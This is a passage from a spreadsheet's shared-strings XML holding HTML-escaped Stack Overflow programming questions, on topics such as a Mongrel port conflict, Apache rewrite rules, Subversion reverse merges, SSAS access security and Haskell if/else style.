&lt;p&gt;One approach I've tried is to 'drag' the folder name from an app I wrote to the file name textbox on the dialog box, highlighting it using a mouse hook technique I picked up from Corneliu Tusnea's &lt;a href="http://readify.net/tech-zone/tech-tools/hawkeye-the-net-runtime-object-editor/Default.aspx" rel="nofollow"&gt;Hawkeye Runtime Object Editor&lt;/a&gt;, and then prepending the path name by pinvoking SendMessage with WM_SETTEXT. It (sort of) works but feels a bit klunky.&lt;/p&gt;
&lt;p&gt;Any advice on technique or implementation for this would be much appreciated. Or if there's an existing utility that already does this, please let me know!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: When all is said and done, I think I'll probably got with an existing utility. However, I would like to know if there &lt;em&gt;is&lt;/em&gt; a way to do this programmatically.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do I get an error when starting ruby on rails app with mongrel_rails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why do I get following error when trying to start a ruby on rails application with &lt;pre&gt;mongrel_rails start&lt;/pre&gt;?&lt;/p&gt;
&lt;pre&gt; 
C:\RailsTest\cookbook2&gt;mongrel_rails start
** WARNING: Win32 does not support daemon mode.
** Daemonized, any open files are closed.  Look at log/mongrel.pid and log/mongr
el.log for info.
** Starting Mongrel listening at 0.0.0.0:3000
c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/../lib/mongrel/t
cphack.rb:12:in `initialize_without_backlog': Only one usage of each socket addr
ess (protocol/network address/port) is normally permitted. - bind(2) (Errno::EAD
DRINUSE)
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/../
lib/mongrel/tcphack.rb:12:in `initialize'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/../
lib/mongrel.rb:93:in `new'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/../
lib/mongrel.rb:93:in `initialize'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/../
lib/mongrel/configurator.rb:139:in `new'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/../
lib/mongrel/configurator.rb:139:in `listener'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/mon
grel_rails:99:in `cloaker_'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/../
lib/mongrel/configurator.rb:50:in `call'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/../
lib/mongrel/configurator.rb:50:in `initialize'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/mon
grel_rails:84:in `new'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/mon
grel_rails:84:in `run'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/../
lib/mongrel/command.rb:212:in `run'
        from c:/ruby/lib/ruby/gems/1.8/gems/mongrel-1.1.5-x86-mswin32-60/bin/mon
grel_rails:281
        from c:/ruby/bin/mongrel_rails:19:in `load'
        from c:/ruby/bin/mongrel_rails:19
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Adapt an Apache mod_rewrite RewriteRule not to act on physical directories</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this RewriteRule that works too well :-)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteRule ^([^/]*)/$ /script.html?id=$1 [L]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The bad thing about this rule is that it also matches physical directories which I don't want.&lt;/p&gt;
&lt;p&gt;How can I tell the &lt;code&gt;mod_rewrite&lt;/code&gt; to ignore physical directories and apply the above rule only when the directory matched does not exist?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can anyone recommend a C++ std::map replacement container?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Maps are great to get things done easily, but they are memory hogs and suffer from caching issues. And when you have a map in a critical loop that can be bad.&lt;/p&gt;
&lt;p&gt;So I was wondering if anyone can recommend another container that has the same API but uses lets say a vector or hash implementation instead of a tree implementation. My goal here is to swap the containers and not have to rewrite all the user code that relies on the map.&lt;/p&gt;
&lt;p&gt;Update: performance wise the best solution would be a tested map facade on a std::vector&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UML connector Direction</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When modelling an architecture in UML component diagrams, how do you show various attributes of connectors simultaneously? Like &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;business object information flow (A-&gt;B, B-&gt;A, A&amp;lt;-&gt;B)&lt;/li&gt;
&lt;li&gt;request/response direction&lt;/li&gt;
&lt;li&gt;synchronous/asynchronous behaviour&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I am aware of other diagram types like sequence diagrams. However, having this information visible in component diagrams would have value. &lt;/p&gt;
&lt;p&gt;What is possible beyond associations (merely showing that components are connected) or "lollipops" (request/response)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Decode an UTF8 email header</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an email subject of the form:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;=?utf-8?B?T3.....?=
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The body of the email is utf-8 base64 encoded - and has decoded fine.
I am current using Perl's Email::MIME module to decode the email.&lt;/p&gt;
&lt;p&gt;What is the meaning of the =?utf-8 delimiter and how do I extract information from this string?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to efficiently count the number of keys/properties of an object in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the fastest way to count the number of keys/properties of an object?  It it possible to do this without iterating over the object?  i.e. without doing&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var count = 0;
for (k in myobj) if (myobj.hasOwnProperty(k)) count++;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(Firefox did provide a magic &lt;code&gt;__count__&lt;/code&gt; property, but this was removed somewhere around version 4.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The Clean programming language in the real world?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any real world applications written in the &lt;a href="http://clean.cs.ru.nl/" rel="nofollow"&gt;Clean&lt;/a&gt; programming language? Either open source or proprietary.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Resources and guides to UI virtualization in WPF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;UI Virtualization is an awkward terminology that describes WPF UI controls that load and and dispose child elements on demand (based on their visibility) to reduce memory footprint. ListBox and ListView use a class called VirtualizingStackPanel by default to achieve higher performance. &lt;/p&gt;
&lt;p&gt;I found &lt;a href="http://blogs.msdn.com/jgoldb/archive/2008/03/08/performant-virtualized-wpf-canvas.aspx"&gt;this control&lt;/a&gt;, which is really helpful, a virtualized canvas which produces a scrollable Canvas object that manages its children with a quadtree. It produces some great results and can easily be tweaked to your needs.&lt;/p&gt;
&lt;p&gt;Are there any other guides or sample wpf controls that deal with this issue? Maybe generic one's that deal with dynamic memory allocation of gui objects in other languages and toolkits?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Objections against Java Webstart?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since the release of Adobe AIR I am wondering why Java Web Start has not gained more attention in the past as to me it seems to be very similar, but web start is available for a much longer time.&lt;/p&gt;
&lt;p&gt;Is it mainly because of bad marketing from Sun, or are there more technical concerns other than the need of having the right JVM installed? Do you have bad experiences using Web Start? If yes, which? What are you recommendations when using Web Start for distributing applications?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Undoing specific revisions in Subversion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose I have a set of commits in a repository folder...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;123 (250 new files, 137 changed files, 14 deleted files)
122 (150 changed files)
121 (renamed folder)
120 (90 changed files)
119 (115 changed files, 14 deleted files, 12 added files)
118 (113 changed files)
117 (10 changed files)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to get a working copy that includes all changes from revision 117 onward but does NOT include the changes for revisions 118 and 120.&lt;/p&gt;
&lt;p&gt;EDIT: To perhaps make the problem clearer, I want to undo the changes that were made in 118 and 120 while retaining all other changes.  The folder contains thousands of files in hundreds of subfolders.&lt;/p&gt;
&lt;p&gt;What is the best way to achieve this?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The answer&lt;/strong&gt;, thanks to Bruno and Bert, is the command (in this case, for removing 120 after the full merge was performed)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;svn merge -c -120 .
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note that the revision number must be specified with a leading minus.  '-120' not '120'&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to secure MS SSAS 2005 for HTTP remote access via Internet?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are building an hosted application that uses MS SQL Server Analysis Services 2005 for some of the reporting, specifically OLAP cube browsing.  Since it is designed to be used by very large global organizations, security is important.&lt;/p&gt;
&lt;p&gt;It seems that Microsoft's preferred client tool for browsing OLAP cubes is Excel 2007 and the whole infrastructure is geared around Windows Integrated Authentication.  We, however, are trying to build an internet-facing web application and do not want to create Windows Accounts for every user.&lt;/p&gt;
&lt;p&gt;It also seems that there are not many nice AJAXy web-based OLAP cube browsing tools (fast, drag-and-drop for dimensions, support for actions, cross-browser etc.) As an aside, we're currently using &lt;a href="http://www.dundas.com/Products/Chart/NET/OLAP/index.aspx" rel="nofollow"&gt;Dundas OLAP Grid&lt;/a&gt; but have also considered &lt;a href="http://www.radar-soft.com/products/radaraspnet_MSAS.aspx" rel="nofollow"&gt;RadarCube&lt;/a&gt; and other more expensive commercial solutions and are still thinking of taking on &lt;a href="http://www.sqlserveranalysisservices.com/cellsetgrid/cellsetgridintro.htm" rel="nofollow"&gt;CellSetGrid&lt;/a&gt; and developing it further - if you know of any other cheap/open solutions please let me know!&lt;/p&gt;
&lt;p&gt;We are therefore planning on providing two modes of access to the cube data:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Through our own Web Application using one of these 3rd party Web-based OLAP browsing tools. &lt;/li&gt;
&lt;li&gt;Direct access from Excel over HTTPS via the msmdpump.dll data pump, for when the web version is too slow/clunky or user needs more powerful analysis.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For the web app access, the connection to the SSAS data source happens from the web server so we can happily pass a CustomData item on the Connection String which indicates which user is connecting.  Since we potentially have too many combinations of rights to create individual SSAS roles for, we have implemented &lt;strong&gt;dynamic dimension security&lt;/strong&gt; that uses a "Cube Users" dimension in conjunction with the CustomData item from the connection string and limits the Allowed Set of various other dimension members accordingly (via other Many-to-Many dinemsion relationships with Measure Groups that contain the 'rights mapping')&lt;/p&gt;
&lt;p&gt;See Mosha on Dimension Security:
&lt;a href="http://www.sqljunkies.com/WebLog/mosha/archive/2004/12/16/5605.aspx" rel="nofollow"&gt;http://www.sqljunkies.com/WebLog/mosha/archive/2004/12/16/5605.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This all seems to work fine so far.&lt;/p&gt;
&lt;p&gt;For the 'direct connection' from Excel, we set up the data pump for HTTP access
(see the &lt;a href="http://www.microsoft.com/technet/prodtechnol/sql/2005/httpasws.mspx" rel="nofollow"&gt;MS Technet article&lt;/a&gt;) but have enabled anonymous access, relying again on the Connection String to control access since we don't have windows accounts.
However, in this case, the connection string is controlled by the user (we push a .odc file from the web app, but a curious user could view &amp;amp; change it), so we cannot rely on users to be good and keep the CustomData=grunt@corp.org from changing to CustomData=superuser@corp.org.  As it turns out, this also causes the same problem with Roles, since these are also specified on the connection string if you are &lt;strong&gt;not&lt;/strong&gt; using Windows Integrated Authentication.&lt;/p&gt;
&lt;p&gt;The question therefore boils down to this: is there a way of getting basic authentication in IIS working without windows accounts in such a way that it can be used with the SSAS data pump to let SSAS know which user is connecting so that dynamic dimension security can be used successfully?&lt;/p&gt;
&lt;p&gt;(This is my first q on StackOverflow and probably the most complicated question I've ever asked: let me know where I haven't explained myself very well and I'll attempt to clarify)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to change the natural order of columns in Postgres?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to change the natural order of columns in Postgres 8.1?&lt;/p&gt;
&lt;p&gt;I know that you shouldn't rely on column order - it's not &lt;em&gt;essential&lt;/em&gt; to what I am doing - I only need it to make some auto-generated stuff come out in a way that is more pleasing, so that the field order matches all the way from pgadmin through the back end and out to the front end.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Call Stack at Runtime</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to access the call stack at runtime in a Native C++ application. I am not using the IDE. How do I display the call stack?&lt;/p&gt;
&lt;p&gt;Update: I have a function which is called from many points all over the application. It crashes on rare occasions. I was looking for a way to get name of the caller and log it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SWD files in Flash Player 9</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody have any pointers to what SWD files are in Flash 9, why Flash Player wants to download them sometimes, how to make ones, how to make use of them? Didn't manage to dig anything useful myself yet.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Update&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I know roughly what are swd files used in Flash8, and &lt;a href="http://livedocs.adobe.com/flex/15/flex_docs_en/wwhelp/wwhimpl/common/html/wwhelp.htm?context=Flex_Documentation&amp;amp;file=00000838.htm" rel="nofollow"&gt;there is even a way to make them&lt;/a&gt;, but Flash 9 doesn't seem to need it at first glance, but still attempts to use sometimes.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GIS/Mapping solutions that provide easy access to routing data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm look for a GIS/Mapping tool that will give me easy SERVER-SIDE access to route information (specifically, trip time and distance) in an ASP.NET web application.&lt;/p&gt;
&lt;p&gt;From what I can tell, Google and Yahoo maps do everything client-side in javascript, but neither provide services to retrieve just the route information. I'm interested in both free and paid products. Also, if you have experience with a product I like to hear about what you think (complexity of API, runtime performance, likes, dislikes, etc.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Algorithm for counting the number of unique colors in an image</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Looking for one that is fast enough and still graceful with memory. The image is a 24bpp  System.Drawing.Bitmap.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does SOA service discovery (UDDI) work in practice?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just reading up on SOA and the service registry / UDDI get mentioned regularly. It sounds nice but how is used in reality?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is the registry meant to decouple a logical service from its' physical implementation (port, url etc)? &lt;/li&gt;
&lt;li&gt;Is the registry meant to be browsed by a human looking for an interesting service to play with?&lt;/li&gt;
&lt;li&gt;Would it be 'wrong' to hard-wire an
application
    to the services it uses?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How accurate can I expect the time to be from a stratum 0 NTP server on the same subnet on ethernet?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that depends on gpsd and ntpd to accurately set the system time on a linux machine.&lt;/p&gt;
&lt;p&gt;gpsd is fed NMEA + PPS&lt;/p&gt;
&lt;p&gt;The application is punping ~25MB per second over the network and I think the loading on the system is causing jitter in the time somehow. (loaded PCI express bus causing irregular interrupt latency)&lt;/p&gt;
&lt;p&gt;I have another machine that is not loaded at all that I could setup to read the GPS and act as an NTP server for the loaded machine. (the loaded machine would be getting startum 1 ???)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How accurate can I expect the time to be from a stratum 0 NTP server on the same subnet on Ethernet?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I hope this is not too off topic, I am sure sometime someone else will be happy the answer is documented here. ;-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to avoid storing credentials to connect to Oracle with JDBC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to setup a JDBC connection to Oracle without providing username/password information in a configuration file (or in any other standard readable location)?&lt;/p&gt;
&lt;p&gt;Typically applications have a configuration file that contains setup parameters to connect to a database. Some DBAs have problems with the fact that usernames and passwords are in clear text in config files.&lt;/p&gt;
&lt;p&gt;I don't think this is possible with Oracle and JDBC, but I need some confirmation...&lt;/p&gt;
&lt;p&gt;A possible compromise is to encrypt the password in the config file and decrypt it before setting up the connection. Of course, the decryption key should not be in the same config file. This will only solve accidental opening of the config file by unauthorized users.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>If you already know LISP, why would you also want to learn F#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the added value for learning F# when you are already familiar with LISP?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to determine if an exception is occurring?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a destructor, is there a way to determine if an exception is currently being processed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best design for lookup-and-possibly-change method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am designing a class that stores (caches) a set of data.  I want to lookup a value, if the class contains the value then use it and modify a property of the class.  I am concerned about the design of the public interface.&lt;br /&gt;
Here is how the class is going to be used:&lt;/p&gt;
&lt;pre&gt;
ClassItem *pClassItem = myClass.Lookup(value);
if (pClassItem)
{ // item is found in class so modify and use it 
  pClassItem-&gt;SetAttribute(something);
  ... // use myClass
}
else
{  // value doesn't exist in the class so add it
  myClass.Add(value, something); 
}
&lt;/pre&gt;
&lt;p&gt;However I don't want to have to expose ClassItem to this client (ClassItem is an implementation detail of MyClass).
To get round that the following could be considered:&lt;/p&gt;
&lt;pre&gt;
bool found = myClass.Lookup(value);
if (found)
{ // item is found in class so modify and use it 
  myClass.ModifyAttribute(value, something);
  ... // use myClass
}
else
{  // value doesn't exist in the class so add it
  myClass.Add(value, something); 
}
&lt;/pre&gt;
&lt;p&gt;However this is inefficient as Modify will have to do the lookup again.  This would suggest a lookupAndModify type of method:&lt;/p&gt;
&lt;pre&gt;
bool found = myClass.LookupAndModify(value, something);
if (found)
{ // item is found in class
  ... // use myClass
}
else
{  // value doesn't exist in the class so add it
  myClass.Add(value, something); 
}
&lt;/pre&gt;
&lt;p&gt;But rolling LookupAndModify into one method seems like very poor design.  It also only modifies if value is found and so the name is not only cumbersome but misleading as well.&lt;/p&gt;
&lt;p&gt;Is there another better design that gets round this issue?  Any design patterns for this (I couldn't find anything through google)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Keyboard shortcuts in an XBAP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to support keyboard shortcuts in my WPF XBAP application, such as &lt;kbd&gt;Ctrl&lt;/kbd&gt;+&lt;kbd&gt;O&lt;/kbd&gt; for 'Open' etc.  How do I disable the browsers built-in keyboard shortcuts and replace them with my own?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Copy / Put text on the clipboard with FireFox, Safari and Chrome</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Internet Explorer I can use the clipboardData object to access the clipboard. How can I do that in FireFox, Safari and/or Chrome?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>QTP_errObject CaptureBitmap</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;May I request you to clarify the issue I have with QTP err object.&lt;/p&gt;
&lt;p&gt;I am trying to capture the screen shot of an object on which error occured.
I use the code &lt;code&gt;object.captureBitmap(filename)&lt;/code&gt; to achieve this.&lt;/p&gt;
&lt;p&gt;I would like to know if it is possible to get the screen shot of the entire page with the err object higlighted.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good Haskell coding style of if/else control block?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm learning Haskell hope it could let me getting closer to functional programming, before learing it, I mostly use C-sytanx like languages, like C, Java or D Programming Language.&lt;/p&gt;
&lt;p&gt;I followed the &lt;a href="http://en.wikibooks.org/wiki/Haskell/Simple_input_and_output"&gt;tutorial on Wikibook&lt;/a&gt;, it goes well so far, I could understand most of them before the chapter "Simple input and output"&lt;/p&gt;
&lt;p&gt;But I do have a little question about the coding style of if/else control block used by the tutorial.&lt;/p&gt;
&lt;p&gt;In the wikibook, the code look like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;doGuessing num = do
   putStrLn "Enter your guess:"
   guess &amp;lt;- getLine
   if (read guess) &amp;lt; num
     then do putStrLn "Too low!"
             doGuessing num
     else if (read guess) &amp;gt; num
            then do putStrLn "Too high!"
                    doGuessing num
            else do putStrLn "You Win!"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It makes me confusing, because this coding style is totally volate "Good Coding Style" in C-sytnax like programming language, where we should ident if/else if/else at same column.&lt;/p&gt;
&lt;p&gt;I know it just not work in Haskell, because it would cause parse error if I ident "else" at same column of "if".&lt;/p&gt;
&lt;p&gt;But what about the following one? I think it is much more clear then the above one. But since the above is used by Wikibook and Yet Another Haskell Tutorial, which marked "best tutorial available online" at offical Haskell website, so I'm not sure whether this coding style is a convention in Haskell programs.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;doGuessing num = do
    putStrLn "Enter your guess:"
    guess &amp;lt;- getLine
    if (read guess) &amp;lt; num then
        do 
            putStrLn "Too low!"
            doGuessing num
        else if (read guess) &amp;gt; num then do 
            putStrLn "Too high!"
            doGuessing num
        else do 
            putStrLn "You Win!"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, I'm curious about which coding style is used more often or is there anthoer coding style for this piece of code? I would like to know it too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to subclass a C struct in C++ and use pointers to the struct in C code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a side effect in doing this:&lt;/p&gt;
&lt;p&gt;C code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct foo {
      int k;
};
int ret_foo(const struct foo* f){ 
    return f.k; 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;C++ code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class bar : public foo {
   int my_bar() { 
       return ret_foo( (foo)this ); 
   }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There's an &lt;code&gt;extern "C"&lt;/code&gt; around the C++ code and each code is inside its own compilation unit.&lt;/p&gt;
&lt;p&gt;Is this portable across compilers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a rating system for the maintainability of source code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm interested in finding some software that can analyze some C# files or an entire C# project/solution and give it a score which rates its ease or difficulty to maintain. Are there products or methods out there that do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to write a class library for OLE Automation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have Excel add-in which I add so many class modules that it is now very bulky. I want to convert it into a type library or a COM package so that I can re-use it for the other apps in the MS Office suite.&lt;/p&gt;
&lt;p&gt;I ported the add-in to Visual Studio as a class library project but Excel Automation doesn't recognize the classes in the compiled .dll file. Intuitively I think I would need a manifest, an interface or the something like that in my code.&lt;/p&gt;
&lt;p&gt;What do I need to know in order to expose a class's methods and properties for use in OLE Automation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I reorder the fields/columns in a SharePoint view?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm adding a new field to a list and view. To add the field to the view, I'm using this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;view.ViewFields.Add("My New Field");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However this just tacks it on to the end of the view. How do I add the field to a particular column, or rearrange the field order? view.ViewFields is an SPViewFieldCollection object that inherits from SPBaseCollection and there are no Insert / Reverse / Sort / RemoveAt methods available.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to programmatically change the work flow between SSIS control flow tasks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an SSIS package, which depending on a boolean variable, should either go to a Script Task or an Email task.(Note: the paths are coming &lt;em&gt;from&lt;/em&gt; a Script Task)&lt;/p&gt;
&lt;p&gt;I recall in the old dts designer there was a way to do this via code. What is the proper way to accomplish this in SSIS?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a good tool for MySQL that will help me optimise my queries and index settings?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use MySQL in a fairly complex web site (PHP driven).&lt;/p&gt;
&lt;p&gt;Ideally, there would be a tool I could use that would help me test the SQL queries I am using and suggest better table indexes that will improve performance and avoid table scans.&lt;/p&gt;
&lt;p&gt;Failing that, something that will tell me exactly what each query is up to, so I can perform the optimisation myself.&lt;/p&gt;
&lt;p&gt;Edit: a simple guide to understanding the output from EXPLAIN ... would also be useful.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is every DDL SQL command reversible? [database version control]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to setup a mechanism for tracking DB schema changes, such the one described in &lt;a href="http://stackoverflow.com/questions/1607/mechanisms-for-tracking-db-schema-changes#1666"&gt;this answer&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;For every change you make to the
  database, you write a new migration.
  Migrations typically have two methods:
  an "up" method in which the changes
  are applied and a "down" method in
  which the changes are undone. A single
  command brings the database up to
  date, and can also be used to bring
  the database to a specific version of
  the schema.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My question is the following: Is every DDL command in an "up" method reversible? In other words, can we always provide a "down" method? Can you imagine any DDL command that can not be "down"ed? &lt;/p&gt;
&lt;p&gt;Please, do not consider the typical data migration problem where during the "up" method we have loss of data: e.g. changing a field type from &lt;code&gt;datetime&lt;/code&gt; (&lt;code&gt;DateOfBirth&lt;/code&gt;) to &lt;code&gt;int&lt;/code&gt; (&lt;code&gt;YearOfBirth&lt;/code&gt;) we are losing data that can not be restored.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which design patterns are underutilized?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a specfic &lt;a href="http://en.wikipedia.org/wiki/Design_Patterns" rel="nofollow"&gt;Gang Of Four Design Pattern&lt;/a&gt; that you frequently use, yet hardly see used in other peoples designs?  If possible, please describe a simple example where this pattern can be useful.  It doesn't have to necessarily be a Gang Of Four pattern, but please include a hyperlink to the pattern's description if you choose a non-GoF pattern.&lt;/p&gt;
&lt;p&gt;Put another way:&lt;br /&gt;
&lt;strong&gt;What are some good/useful design patterns that I, or someone else who does have a passing knowledge of the main patterns, may not already know?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Assembler file as input for a driver build with the WDK tools</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to get an assembler file to be compiled and linked into a driver build.&lt;/p&gt;
&lt;p&gt;To clarify a bit&lt;/p&gt;
&lt;p&gt;The SOURCES file :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TARGETTYPE=DRIVER
DRIVERTYPE=WDM
TARGETPATH=obj
TARGETNAME=bla
INCLUDES=$(DDK_INC_PATH)
TARGETLIBS=$(DDK_LIB_PATH)\ks.lib
SOURCES=x.cpp y.cpp z.asm
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem occurs with the &lt;code&gt;z.asm file&lt;/code&gt;. &lt;code&gt;NMAKE&lt;/code&gt; complains that it does not know how to build &lt;code&gt;z.obj&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;So the question is, how to get the asm file assembled with &lt;code&gt;build&lt;/code&gt; and linked into &lt;code&gt;bla.sys&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Retrieve Error text from SQL Server 2000 error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need help logging errors from T-SQL in SQL Server 2000.  We need to log errors that we trap, but are having trouble getting the same information we would have had sitting in front of SQL Server Management Studio.&lt;/p&gt;
&lt;p&gt;I can get a message without any argument substitution like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT MSG.description from master.dbo.sysmessages MSG
INNER JOIN sys.syslanguages LANG ON MSG.msglangID=LANG.msglangid
WHERE MSG.error=@err AND LANG.langid=@@LANGID
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I have not found any way of finding out the error arguments.  I want to see:&lt;/p&gt;
&lt;p&gt;Constraint violation MYCONSTRAINT2 on table MYTABLE7&lt;/p&gt;
&lt;p&gt;not&lt;/p&gt;
&lt;p&gt;Constraint violation %s on table %s&lt;/p&gt;
&lt;p&gt;Googling has only turned up exotic schemes using DBCC OUTPUTBUFFER that require admin access and aren't appropriate for production code.  How do I get an error message with argument replacement?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP: using preg_replace with htmlentities</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing an &lt;code&gt;RSS&lt;/code&gt; to &lt;code&gt;JSON parser&lt;/code&gt; and as a part of that, I need to use &lt;code&gt;htmlentities()&lt;/code&gt; on any tag found inside the description tag. Currently, I'm trying to use &lt;code&gt;preg_replace()&lt;/code&gt;, but I'm struggling a little with it. My current (non-working) code looks like:&lt;/p&gt;
